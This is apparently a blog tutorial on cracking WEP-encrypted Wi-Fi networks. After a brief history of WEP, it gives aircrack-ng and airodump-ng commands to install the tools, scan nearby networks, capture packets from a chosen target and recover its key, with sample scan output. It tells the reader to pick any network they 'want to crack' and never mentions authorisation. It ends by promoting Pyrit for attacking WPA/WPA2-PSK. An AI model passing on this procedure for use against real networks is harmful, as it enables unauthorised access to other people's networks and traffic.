How to Hack a Wireless Network

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other, but from outsiders), hence the name WEP.

Despite the intention, several serious weaknesses were identified by cryptanalysts over the last years. The severity of the weaknesses means that any WEP protected network can be cracked using the right software within two minutes or less.

WEP was superseded by Wi-Fi Protected Access (also known as WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping.

Hack Versus Crack

For your information - just to get the right jargon.

The Eric S. Raymonds Jargon File contains a bunch of definitions of the term “hacker”, most having to do with technical adeptness and a delight in solving problems and overcoming limits. The basic difference between a hacker and a cracker is this: hackers build things, crackers break them.

Howto Conduct The Actual Crack

It’s fairly easy to crack a WEP encrypted wireless network, because the WEP encryption has some serious flaws in its design, flaws that makes it easy and fast to crack or hack.

Install aircrack-ng - on Debian or Ubuntu by:

sudo aptitude install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

CH  1 ][ Elapsed: 9 mins ][ 2012-08-19 18:35
 
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

70:71:BC:A6:FF:FF  -68      285      191    0   4  54e  WEP  WEP         wifi-0
00:17:9A:F1:FF:FF  -77      599      104    0   6  54 . WEP  WEP         wifi-1
4C:E6:76:C4:FF:FF  -38      926       60    0   2  54e  WPA2 CCMP   PSK  wifi-2
C4:3D:C7:34:FF:FF  -62      476      397    0   8  54e  WPA  TKIP   PSK  wifi-3

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

Only WEP Encrypted Networks

Keep in mind that this approach is only usable in relation to WEP encrypted wireless networks, and cannot be used to crack WPA and WPA2 encrypted networks.

However, there is a new project called Pyrit,which is currently under it’s way. Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool - keep that in mind ;-)

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.